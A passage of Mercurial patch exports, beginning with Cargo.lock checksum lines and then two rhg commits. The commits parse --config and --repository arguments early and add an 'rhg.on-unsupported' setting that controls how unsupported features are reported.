(registry+https://github.com/rust-lang/crates.io-index)" = "cb936af9de38476664d6b58e529aff30d482e4ce1c5e150293d00730b0d81fdb" -"checksum cc 1.0.66 (registry+https://github.com/rust-lang/crates.io-index)" = "4c0496836a84f8d0495758516b8621a622beb77c0fed418570e50764093ced48" -"checksum cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)" = "4785bdd1c96b2a846b2bd7cc02e86b6b3dbf14e7e53446c4f54c92a361040822" -"checksum cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" -"checksum chrono 0.4.19 (registry+https://github.com/rust-lang/crates.io-index)" = "670ad68c9088c2a963aaa298cb369688cf3f9465ce5e2d4ca10e6e0098a1ce73" -"checksum clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)" = "37e58ac78573c40708d45522f0d80fa2f01cc4f9b4e2bf749807255454312002" -"checksum const_fn 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)" = "cd51eab21ab4fd6a3bf889e2d0958c0a6e3a61ad04260325e919e652a2a62826" -"checksum cpython 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)" = "bfaf3847ab963e40c4f6dd8d6be279bdf74007ae2413786a0dcbb28c52139a95" -"checksum crc32fast 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "81156fece84ab6a9f2afdb109ce3ae577e42b1228441eded99bd77f627953b1a" -"checksum crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)" = "b153fe7cbef478c567df0f972e02e6d736db11affe43dfc9c56a9374d1adfb87" -"checksum crossbeam-channel 0.5.0 (registry+https://github.com/rust-lang/crates.io-index)" = "dca26ee1f8d361640700bde38b2c37d8c22b3ce2d360e1fc1c74ea4b0aa7d775" -"checksum crossbeam-deque 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)" = "94af6efb46fef72616855b036a624cf27ba656ffc9be1b9a3c931cfc7749a9a9" -"checksum crossbeam-epoch 0.9.1 (registry+https://github.com/rust-lang/crates.io-index)" = "a1aaa739f95311c2c7887a76863f500026092fb1dce0161dab577e559ef3569d" -"checksum crossbeam-utils 
0.7.2 (registry+https://github.com/rust-lang/crates.io-index)" = "c3c7c73a2d1e9fc0886a08b93e98eb643461230d5f1925e4036204d5f2e261a8" -"checksum crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)" = "02d96d1e189ef58269ebe5b97953da3274d83a93af647c2ddd6f9dab28cedb8d" -"checksum ctor 0.1.16 (registry+https://github.com/rust-lang/crates.io-index)" = "7fbaabec2c953050352311293be5c6aba8e141ba19d6811862b232d6fd020484" -"checksum derive_more 0.99.11 (registry+https://github.com/rust-lang/crates.io-index)" = "41cb0e6161ad61ed084a36ba71fbba9e3ac5aee3606fb607fe08da6acbcf3d8c" -"checksum difference 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "524cbf6897b527295dff137cec09ecf3a05f4fddffd7dfcd1585403449e74198" -"checksum either 1.6.1 (registry+https://github.com/rust-lang/crates.io-index)" = "e78d4f1cc4ae33bbfc157ed5d5a5ef3bc29227303d595861deb238fcec4e9457" -"checksum env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)" = "44533bbbb3bb3c1fa17d9f2e4e38bbbaf8396ba82193c4cb1b6445d711445d36" -"checksum flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)" = "7411863d55df97a419aa64cb4d2f167103ea9d767e2c54a1868b7ac3f6b47129" -"checksum format-bytes 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)" = "cc35f5e45d6b31053cea13078ffc6fa52fa8617aa54b7ac2011720d9c009e04f" -"checksum format-bytes-macros 0.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = "b05089e341a0460449e2210c3bf7b61597860b07f0deae58da38dbed0a4c6b6d" -"checksum fuchsia-cprng 0.1.1 (registry+https://github.com/rust-lang/crates.io-index)" = "a06f77d526c1a601b7c4cdd98f54b5eaabffc14d5f2f0296febdc7f357c6d3ba" -"checksum gcc 0.3.55 (registry+https://github.com/rust-lang/crates.io-index)" = "8f5f3913fa0bfe7ee1fd8248b6b9f42a5af4b9d65ec2dd2c3c26132b950ecfc2" -"checksum getrandom 0.1.15 (registry+https://github.com/rust-lang/crates.io-index)" = "fc587bc0ec293155d5bfa6b9891ec18a1e330c234f896ea47fbada4cadbe47e6" -"checksum glob 
0.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = "9b919933a397b79c37e33b77bb2aa3dc8eb6e165ad809e58ff75bc7db2e34574" -"checksum hermit-abi 0.1.17 (registry+https://github.com/rust-lang/crates.io-index)" = "5aca5565f760fb5b220e499d72710ed156fdb74e631659e99377d9ebfbd13ae8" -"checksum home 0.5.3 (registry+https://github.com/rust-lang/crates.io-index)" = "2456aef2e6b6a9784192ae780c0f15bc57df0e918585282325e8c8ac27737654" -"checksum humantime 1.3.0 (registry+https://github.com/rust-lang/crates.io-index)" = "df004cfca50ef23c36850aaaa59ad52cc70d0e90243c3c7737a4dd32dc7a3c4f" -"checksum im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "3ca8957e71f04a205cb162508f9326aea04676c8dfd0711220190d6b83664f3f" -"checksum itertools 0.9.0 (registry+https://github.com/rust-lang/crates.io-index)" = "284f18f85651fe11e8a991b2adb42cb078325c996ed026d994719efcfca1d54b" -"checksum jobserver 0.1.21 (registry+https://github.com/rust-lang/crates.io-index)" = "5c71313ebb9439f74b00d9d2dcec36440beaf57a6aa0623068441dd7cd81a7f2" -"checksum lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "e2abad23fbc42b3700f2f279844dc832adb2b2eb069b2df918f455c4e18cc646" -"checksum libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)" = "1482821306169ec4d07f6aca392a4681f66c75c9918aa49641a2595db64053cb" -"checksum libz-sys 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "602113192b08db8f38796c4e85c39e960c145965140e918018bcde1952429655" -"checksum log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)" = "4fabed175da42fed1fa0746b0ea71f412aa9d35e76e95e59b192c64b9dc2bf8b" -"checksum maybe-uninit 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)" = "60302e4db3a61da70c0cb7991976248362f30319e88850c487b9b95bbf059e00" -"checksum memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)" = "0ee1c47aaa256ecabcaea351eae4a9b01ef39ed810004e298d2511ed284b1525" -"checksum memmap 0.7.0 
(registry+https://github.com/rust-lang/crates.io-index)" = "6585fd95e7bb50d6cc31e20d4cf9afb4e2ba16c5846fc76793f11218da9c475b" -"checksum memoffset 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)" = "157b4208e3059a8f9e78d559edc658e13df41410cb3ae03979c83130067fdd87" -"checksum micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)" = "2620153e1d903d26b72b89f0e9c48d8c4756cba941c185461dddc234980c298c" -"checksum micro-timer-macros 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)" = "e28a3473e6abd6e9aab36aaeef32ad22ae0bd34e79f376643594c2b152ec1c5d" -"checksum miniz_oxide 0.4.3 (registry+https://github.com/rust-lang/crates.io-index)" = "0f2d26ec3309788e423cfbf68ad1800f061638098d76a83681af979dc4eda19d" -"checksum num-integer 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)" = "d2cc698a63b549a70bc047073d2949cce27cd1c7b0a4a862d08a8031bc2801db" -"checksum num-traits 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)" = "9a64b1ec5cda2586e284722486d802acf1f7dbdc623e2bfc57e65ca1cd099290" -"checksum num_cpus 1.13.0 (registry+https://github.com/rust-lang/crates.io-index)" = "05499f3756671c15885fee9034446956fff3f243d6077b91e5767df161f766b3" -"checksum output_vt100 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "53cdc5b785b7a58c5aad8216b3dfa114df64b0b06ae6e1501cef91df2fbdf8f9" -"checksum pkg-config 0.3.19 (registry+https://github.com/rust-lang/crates.io-index)" = "3831453b3449ceb48b6d9c7ad7c96d5ea673e9b470a1dc578c2ce6521230884c" -"checksum ppv-lite86 0.2.10 (registry+https://github.com/rust-lang/crates.io-index)" = "ac74c624d6b2d21f425f752262f42188365d7b8ff1aff74c82e45136510a4857" -"checksum pretty_assertions 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)" = "3f81e1644e1b54f5a68959a29aa86cde704219254669da328ecfdf6a1f09d427" -"checksum proc-macro-hack 0.5.19 (registry+https://github.com/rust-lang/crates.io-index)" = 
"dbf0c48bc1d91375ae5c3cd81e3722dff1abcf81a30960240640d223f59fe0e5" -"checksum proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)" = "1e0704ee1a7e00d7bb417d0770ea303c1bccbabf0ef1667dae92b5967f5f8a71" -"checksum python27-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)" = "67cb041de8615111bf224dd75667af5f25c6e032118251426fed7f1b70ce4c8c" -"checksum python3-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)" = "90af11779515a1e530af60782d273b59ac79d33b0e253c071a728563957c76d4" -"checksum quick-error 1.2.3 (registry+https://github.com/rust-lang/crates.io-index)" = "a1d01941d82fa2ab50be1e79e6714289dd7cde78eba4c074bc5a4374f650dfe0" -"checksum quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)" = "aa563d17ecb180e500da1cfd2b028310ac758de548efdd203e18f283af693f37" -"checksum rand 0.3.23 (registry+https://github.com/rust-lang/crates.io-index)" = "64ac302d8f83c0c1974bf758f6b041c6c8ada916fbb44a609158ca8b064cc76c" -"checksum rand 0.4.6 (registry+https://github.com/rust-lang/crates.io-index)" = "552840b97013b1a26992c11eac34bdd778e464601a4c2054b5f0bff7c6761293" -"checksum rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)" = "6a6b1679d49b24bbfe0c803429aa1874472f50d9b363131f0e89fc356b544d03" -"checksum rand_chacha 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)" = "f4c8ed856279c9737206bf725bf36935d8666ead7aa69b52be55af369d193402" -"checksum rand_core 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)" = "7a6fdeb83b075e8266dcc8762c22776f6877a63111121f5f8c7411e5be7eed4b" -"checksum rand_core 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)" = "9c33a3c44ca05fa6f1807d8e6743f3824e8509beca625669633be0acbdf509dc" -"checksum rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)" = "90bde5296fc891b0cef12a6d03ddccc162ce7b2aff54160af9338f8d40df6d19" -"checksum rand_distr 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)" = 
"96977acbdd3a6576fb1d27391900035bf3863d4a16422973a409b488cf29ffb2" -"checksum rand_hc 0.2.0 (registry+https://github.com/rust-lang/crates.io-index)" = "ca3129af7b92a17112d59ad498c6f81eaf463253766b90396d39ea7a39d6613c" -"checksum rand_pcg 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "16abd0c1b639e9eb4d7c50c0b8100b0d0f849be2349829c740fe8e6eb4816429" -"checksum rand_xoshiro 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "a9fcdd2e881d02f1d9390ae47ad8e5696a9e4be7b547a1da2afbc61973217004" -"checksum rayon 1.5.0 (registry+https://github.com/rust-lang/crates.io-index)" = "8b0d8e0819fadc20c74ea8373106ead0600e3a67ef1fe8da56e39b9ae7275674" -"checksum rayon-core 1.9.0 (registry+https://github.com/rust-lang/crates.io-index)" = "9ab346ac5921dc62ffa9f89b7a773907511cdfa5490c572ae9be1be33e8afa4a" -"checksum rdrand 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "678054eb77286b51581ba43620cc911abf02758c91f93f479767aed0f90458b2" -"checksum redox_syscall 0.1.57 (registry+https://github.com/rust-lang/crates.io-index)" = "41cc0f7e4d5d4544e8861606a285bb08d3e70712ccc7d2b84d7c0ccfaf4b05ce" -"checksum regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)" = "38cf2c13ed4745de91a5eb834e11c00bcc3709e773173b2ce4c56c9fbde04b9c" -"checksum regex-syntax 0.6.21 (registry+https://github.com/rust-lang/crates.io-index)" = "3b181ba2dcf07aaccad5448e8ead58db5b742cf85dfe035e2227f137a539a189" -"checksum remove_dir_all 0.5.3 (registry+https://github.com/rust-lang/crates.io-index)" = "3acd125665422973a33ac9d3dd2df85edad0f4ae9b00dafb1a05e43a9f5ef8e7" -"checksum rust-crypto 0.2.36 (registry+https://github.com/rust-lang/crates.io-index)" = "f76d05d3993fd5f4af9434e8e436db163a12a9d40e1a58a726f27a01dfd12a2a" -"checksum rustc-serialize 0.3.24 (registry+https://github.com/rust-lang/crates.io-index)" = "dcf128d1287d2ea9d80910b5f1120d0b8eede3fbf1abe91c40d39ea7d51e6fda" -"checksum same-file 1.0.6 
(registry+https://github.com/rust-lang/crates.io-index)" = "93fc1dc3aaa9bfed95e02e6eadabb4baf7e3078b0bd1b4d7b6b0b68378900502" -"checksum scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "d29ab0c6d3fc0ee92fe66e2d99f700eab17a8d57d1c1d3b748380fb20baa78cd" -"checksum sized-chunks 0.6.2 (registry+https://github.com/rust-lang/crates.io-index)" = "1ec31ceca5644fa6d444cc77548b88b67f46db6f7c71683b0f9336e671830d2f" -"checksum static_assertions 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "a2eb9349b6444b326872e140eb1cf5e7c522154d69e7a0ffb0fb81c06b37543f" -"checksum strsim 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)" = "8ea5119cdb4c55b55d432abb513a0429384878c15dde60cc77b1c99de1a95a6a" -"checksum syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)" = "9a2af957a63d6bd42255c359c93d9bfdb97076bd3b820897ce55ffbfbf107f44" -"checksum tempfile 3.1.0 (registry+https://github.com/rust-lang/crates.io-index)" = "7a6e24d9338a0a5be79593e2fa15a648add6138caa803e2d5bc782c371732ca9" -"checksum termcolor 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)" = "2dfed899f0eb03f32ee8c6a0aabdb8a7949659e3466561fc0adf54e26d88c5f4" -"checksum textwrap 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)" = "d326610f408c7a4eb6f51c37c330e496b08506c9457c9d34287ecc38809fb060" -"checksum thread_local 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)" = "d40c6d1b69745a6ec6fb1ca717914848da4b44ae29d9b3080cbee91d72a69b14" -"checksum time 0.1.44 (registry+https://github.com/rust-lang/crates.io-index)" = "6db9e6914ab8b1ae1c260a4ae7a49b6c5611b40328a735b21862567685e73255" -"checksum twox-hash 1.6.0 (registry+https://github.com/rust-lang/crates.io-index)" = "04f8ab788026715fa63b31960869617cba39117e520eb415b0139543e325ab59" -"checksum typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)" = "373c8a200f9e67a0c95e62a4f52fbf80c23b4381c05a17845531982fa99e6b33" -"checksum unicode-width 0.1.8 
(registry+https://github.com/rust-lang/crates.io-index)" = "9337591893a19b88d8d87f2cec1e73fad5cdfd10e5a6f349f498ad6ea2ffb1e3" -"checksum unicode-xid 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)" = "f7fe0bb3479651439c9112f72b6c505038574c9fbb575ed1bf3b797fa39dd564" -"checksum users 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)" = "24cc0f6d6f267b73e5a2cadf007ba8f9bc39c6a6f9666f8cf25ea809a153b032" -"checksum vcpkg 0.2.11 (registry+https://github.com/rust-lang/crates.io-index)" = "b00bca6106a5e23f3eee943593759b7fcddb00554332e856d990c893966879fb" -"checksum vec_map 0.8.2 (registry+https://github.com/rust-lang/crates.io-index)" = "f1bddf1187be692e79c5ffeab891132dfb0f236ed36a43c7ed39f1165ee20191" -"checksum version_check 0.9.2 (registry+https://github.com/rust-lang/crates.io-index)" = "b5a972e5669d67ba988ce3dc826706fb0a8b01471c088cb0b6110b805cc36aed" -"checksum wasi 0.10.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)" = "1a143597ca7c7793eff794def352d41792a93c481eb1042423ff7ff72ba2c31f" -"checksum wasi 0.9.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)" = "cccddf32554fecc6acb585f82a32a72e28b48f8c4c1883ddfeeeaa96f7d8e519" -"checksum winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)" = "5c839a674fcd7a98952e593242ea400abe93992746761e38641405d28b00f419" -"checksum winapi-i686-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "ac3b87c63620426dd9b991e5ce0329eff545bccbbb34f3be09ff6fb6ab51b7b6" -"checksum winapi-util 0.1.5 (registry+https://github.com/rust-lang/crates.io-index)" = "70ec6ce85bb158151cae5e5c87f95a8e97d2c0c4b001223f33a334e3ce5de178" -"checksum winapi-x86_64-pc-windows-gnu 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)" = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" -"checksum zstd 0.5.3+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)" = 
"01b32eaf771efa709e8308605bbf9319bf485dc1503179ec0469b611937c0cd8" -"checksum zstd-safe 2.0.5+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)" = "1cfb642e0d27f64729a639c52db457e0ae906e7bc6f5fe8f5c453230400f1055" -"checksum zstd-sys 1.4.17+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)" = "b89249644df056b522696b1bb9e7c18c87e8ffa3e2f0dc3b0155875d6498f01b" # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614603095 -3600 # Mon Mar 01 13:51:35 2021 +0100 # Node ID 7284b524b441248b2c5b5480aac3f875c61dd603 # Parent 46cdd6660503fdf783a44e60186c38c41a2f384e rhg: Make configuration available as early as possible in main() Differential Revision: https://phab.mercurial-scm.org/D10090 diff --git a/rust/rhg/src/blackbox.rs b/rust/rhg/src/blackbox.rs --- a/rust/rhg/src/blackbox.rs +++ b/rust/rhg/src/blackbox.rs @@ -52,20 +52,22 @@ process_start_time: &'a ProcessStartTime, ) -> Result<Self, HgError> { let configured = if let Ok(repo) = invocation.repo { - let config = invocation.config(); - if config.get(b"extensions", b"blackbox").is_none() { + if invocation.config.get(b"extensions", b"blackbox").is_none() { // The extension is not enabled None } else { Some(ConfiguredBlackbox { repo, - max_size: config + max_size: invocation + .config .get_byte_size(b"blackbox", b"maxsize")? .unwrap_or(DEFAULT_MAX_SIZE), - max_files: config + max_files: invocation + .config .get_u32(b"blackbox", b"maxfiles")? .unwrap_or(DEFAULT_MAX_FILES), - date_format: config + date_format: invocation + .config .get_str(b"blackbox", b"date-format")? 
.unwrap_or(DEFAULT_DATE_FORMAT), }) diff --git a/rust/rhg/src/commands/config.rs b/rust/rhg/src/commands/config.rs --- a/rust/rhg/src/commands/config.rs +++ b/rust/rhg/src/commands/config.rs @@ -29,7 +29,7 @@ .split_2(b'.') .ok_or_else(|| HgError::abort(""))?; - let value = invocation.config().get(section, name).unwrap_or(b""); + let value = invocation.config.get(section, name).unwrap_or(b""); invocation.ui.write_stdout(&format_bytes!(b"{}\n", value))?; Ok(()) diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -7,7 +7,10 @@ use format_bytes::format_bytes; use hg::config::Config; use hg::repo::{Repo, RepoError}; -use std::path::{Path, PathBuf}; +use hg::utils::files::{get_bytes_from_os_str, get_path_from_bytes}; +use hg::utils::SliceExt; +use std::ffi::OsString; +use std::path::PathBuf; mod blackbox; mod error; @@ -16,10 +19,11 @@ use error::CommandError; fn main_with_result( + process_start_time: &blackbox::ProcessStartTime, ui: &ui::Ui, - process_start_time: &blackbox::ProcessStartTime, + repo: Result<&Repo, &NoRepoInCwdError>, + config: &Config, ) -> Result<(), CommandError> { - env_logger::init(); let app = App::new("rhg") .global_setting(AppSettings::AllowInvalidUtf8) .setting(AppSettings::SubcommandRequired) @@ -57,29 +61,11 @@ let subcommand_args = subcommand_matches .expect("no subcommand arguments from clap despite AppSettings::SubcommandRequired"); - let config_args = matches - .values_of_os("config") - // Turn `Option::None` into an empty iterator: - .into_iter() - .flatten() - .map(hg::utils::files::get_bytes_from_os_str); - let non_repo_config = &hg::config::Config::load(config_args)?; - - let repo_path = matches.value_of_os("repository").map(Path::new); - let repo = match Repo::find(non_repo_config, repo_path) { - Ok(repo) => Ok(repo), - Err(RepoError::NotFound { at }) if repo_path.is_none() => { - // Not finding a repo is not fatal yet, if `-R` was not given - Err(NoRepoInCwdError { cwd: 
at }) - } - Err(error) => return Err(error.into()), - }; - let invocation = CliInvocation { ui, subcommand_args, - non_repo_config, - repo: repo.as_ref(), + config, + repo, }; let blackbox = blackbox::Blackbox::new(&invocation, process_start_time)?; blackbox.log_command_start(); @@ -94,17 +80,36 @@ // measurements. Reading config files can be slow if they’re on NFS. let process_start_time = blackbox::ProcessStartTime::now(); + env_logger::init(); let ui = ui::Ui::new(); - let result = main_with_result(&ui, &process_start_time); - if let Err(CommandError::Abort { message }) = &result { - if !message.is_empty() { - // Ignore errors when writing to stderr, we’re already exiting - // with failure code so there’s not much more we can do. - let _ = ui.write_stderr(&format_bytes!(b"abort: {}\n", message)); + let early_args = EarlyArgs::parse(std::env::args_os()); + let non_repo_config = Config::load(early_args.config) + .unwrap_or_else(|error| exit(&ui, Err(error.into()))); + + let repo_path = early_args.repo.as_deref().map(get_path_from_bytes); + let repo_result = match Repo::find(&non_repo_config, repo_path) { + Ok(repo) => Ok(repo), + Err(RepoError::NotFound { at }) if repo_path.is_none() => { + // Not finding a repo is not fatal yet, if `-R` was not given + Err(NoRepoInCwdError { cwd: at }) } - } - std::process::exit(exit_code(&result)) + Err(error) => exit(&ui, Err(error.into())), + }; + + let config = if let Ok(repo) = &repo_result { + repo.config() + } else { + &non_repo_config + }; + + let result = main_with_result( + &process_start_time, + &ui, + repo_result.as_ref(), + config, + ); + exit(&ui, result) } fn exit_code(result: &Result<(), CommandError>) -> i32 { @@ -118,6 +123,17 @@ } } +fn exit(ui: &Ui, result: Result<(), CommandError>) -> ! { + if let Err(CommandError::Abort { message }) = &result { + if !message.is_empty() { + // Ignore errors when writing to stderr, we’re already exiting + // with failure code so there’s not much more we can do. 
+ let _ = ui.write_stderr(&format_bytes!(b"abort: {}\n", message)); + } + } + std::process::exit(exit_code(&result)) +} + macro_rules! subcommands { ($( $command: ident )+) => { mod commands { @@ -157,7 +173,7 @@ pub struct CliInvocation<'a> { ui: &'a Ui, subcommand_args: &'a ArgMatches<'a>, - non_repo_config: &'a Config, + config: &'a Config, /// References inside `Result` is a bit peculiar but allow /// `invocation.repo?` to work out with `&CliInvocation` since this /// `Result` type is `Copy`. @@ -168,12 +184,45 @@ cwd: PathBuf, } -impl CliInvocation<'_> { - fn config(&self) -> &Config { - if let Ok(repo) = self.repo { - repo.config() - } else { - self.non_repo_config +/// CLI arguments to be parsed "early" in order to be able to read +/// configuration before using Clap. Ideally we would also use Clap for this, +/// see <https://github.com/clap-rs/clap/discussions/2366>. +/// +/// These arguments are still declared when we do use Clap later, so that Clap +/// does not return an error for their presence. +struct EarlyArgs { + /// Values of all `--config` arguments. (Possibly none) + config: Vec<Vec<u8>>, + /// Value of the `-R` or `--repository` argument, if any. + repo: Option<Vec<u8>>, +} + +impl EarlyArgs { + fn parse(args: impl IntoIterator<Item = OsString>) -> Self { + let mut args = args.into_iter().map(get_bytes_from_os_str); + let mut config = Vec::new(); + let mut repo = None; + // Use `while let` instead of `for` so that we can also call + // `args.next()` inside the loop. 
+ while let Some(arg) = args.next() { + if arg == b"--config" { + if let Some(value) = args.next() { + config.push(value) + } + } else if let Some(value) = arg.drop_prefix(b"--config=") { + config.push(value.to_owned()) + } + + if arg == b"--repository" || arg == b"-R" { + if let Some(value) = args.next() { + repo = Some(value) + } + } else if let Some(value) = arg.drop_prefix(b"--repository=") { + repo = Some(value.to_owned()) + } else if let Some(value) = arg.drop_prefix(b"-R") { + repo = Some(value.to_owned()) + } } + Self { config, repo } } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614611922 -3600 # Mon Mar 01 16:18:42 2021 +0100 # Node ID 33f2d56acc732bf97e700c48bc0bcb130351c22b # Parent 7284b524b441248b2c5b5480aac3f875c61dd603 rhg: Add a `rhg.on-unsupported` configuration key For now the two values are: * `abort-silent`: silently exit with code 252, the previous default behavior * `abort`: print an error message about what feature is not supported, then exit with code 252. Now the default. Differential Revision: https://phab.mercurial-scm.org/D10091 diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -60,6 +60,8 @@ invocation.ui.write_stdout(&data)?; Ok(()) } - None => Err(CommandError::Unimplemented.into()), + None => Err(CommandError::unsupported( + "`rhg cat` without `--rev` / `-r`", + )), } } diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -15,12 +15,11 @@ /// Exit with an error message and "standard" failure exit code. Abort { message: Vec<u8> }, - /// A mercurial capability as not been implemented. - /// - /// There is no error message printed in this case. - /// Instead, we exit with a specic status code and a wrapper script may - /// fallback to Python-based Mercurial. 
- Unimplemented, + /// Encountered something (such as a CLI argument, repository layout, …) + /// not supported by this version of `rhg`. Depending on configuration + /// `rhg` may attempt to silently fall back to Python-based `hg`, which + /// may or may not support this feature. + UnsupportedFeature { message: Vec<u8> }, } impl CommandError { @@ -32,20 +31,28 @@ message: utf8_to_local(message.as_ref()).into(), } } + + pub fn unsupported(message: impl AsRef<str>) -> Self { + CommandError::UnsupportedFeature { + message: utf8_to_local(message.as_ref()).into(), + } + } } /// For now we don’t differenciate between invalid CLI args and valid for `hg` /// but not supported yet by `rhg`. impl From<clap::Error> for CommandError { - fn from(_: clap::Error) -> Self { - CommandError::Unimplemented + fn from(error: clap::Error) -> Self { + CommandError::unsupported(error.to_string()) } } impl From<HgError> for CommandError { fn from(error: HgError) -> Self { match error { - HgError::UnsupportedFeature(_) => CommandError::Unimplemented, + HgError::UnsupportedFeature(message) => { + CommandError::unsupported(message) + } _ => CommandError::abort(error.to_string()), } } diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -84,8 +84,15 @@ let ui = ui::Ui::new(); let early_args = EarlyArgs::parse(std::env::args_os()); - let non_repo_config = Config::load(early_args.config) - .unwrap_or_else(|error| exit(&ui, Err(error.into()))); + let non_repo_config = + Config::load(early_args.config).unwrap_or_else(|error| { + // Normally this is decided based on config, but we don’t have that + // available. As of this writing config loading never returns an + // "unsupported" error but that is not enforced by the type system. 
+ let on_unsupported = OnUnsupported::Abort; + + exit(&ui, on_unsupported, Err(error.into())) + }); let repo_path = early_args.repo.as_deref().map(get_path_from_bytes); let repo_result = match Repo::find(&non_repo_config, repo_path) { @@ -94,7 +101,11 @@ // Not finding a repo is not fatal yet, if `-R` was not given Err(NoRepoInCwdError { cwd: at }) } - Err(error) => exit(&ui, Err(error.into())), + Err(error) => exit( + &ui, + OnUnsupported::from_config(&non_repo_config), + Err(error.into()), + ), }; let config = if let Ok(repo) = &repo_result { @@ -109,7 +120,7 @@ repo_result.as_ref(), config, ); - exit(&ui, result) + exit(&ui, OnUnsupported::from_config(config), result) } fn exit_code(result: &Result<(), CommandError>) -> i32 { @@ -119,16 +130,37 @@ // Exit with a specific code and no error message to let a potential // wrapper script fallback to Python-based Mercurial. - Err(CommandError::Unimplemented) => exitcode::UNIMPLEMENTED, + Err(CommandError::UnsupportedFeature { .. }) => { + exitcode::UNIMPLEMENTED + } } } -fn exit(ui: &Ui, result: Result<(), CommandError>) -> ! { - if let Err(CommandError::Abort { message }) = &result { - if !message.is_empty() { - // Ignore errors when writing to stderr, we’re already exiting - // with failure code so there’s not much more we can do. - let _ = ui.write_stderr(&format_bytes!(b"abort: {}\n", message)); +fn exit( + ui: &Ui, + on_unsupported: OnUnsupported, + result: Result<(), CommandError>, +) -> ! { + match &result { + Ok(_) => {} + Err(CommandError::Abort { message }) => { + if !message.is_empty() { + // Ignore errors when writing to stderr, we’re already exiting + // with failure code so there’s not much more we can do. 
+ let _ = + ui.write_stderr(&format_bytes!(b"abort: {}\n", message)); + } + } + Err(CommandError::UnsupportedFeature { message }) => { + match on_unsupported { + OnUnsupported::Abort => { + let _ = ui.write_stderr(&format_bytes!( + b"unsupported feature: {}\n", + message + )); + } + OnUnsupported::AbortSilent => {} + } } } std::process::exit(exit_code(&result)) @@ -226,3 +258,29 @@ Self { config, repo } } } + +/// What to do when encountering some unsupported feature. +/// +/// See `HgError::UnsupportedFeature` and `CommandError::UnsupportedFeature`. +enum OnUnsupported { + /// Print an error message describing what feature is not supported, + /// and exit with code 252. + Abort, + /// Silently exit with code 252. + AbortSilent, +} + +impl OnUnsupported { + fn from_config(config: &Config) -> Self { + let default = OnUnsupported::Abort; + match config.get(b"rhg", b"on-unsupported") { + Some(b"abort") => OnUnsupported::Abort, + Some(b"abort-silent") => OnUnsupported::AbortSilent, + None => default, + Some(_) => { + // TODO: warn about unknown config value + default + } + } + } +} diff --git 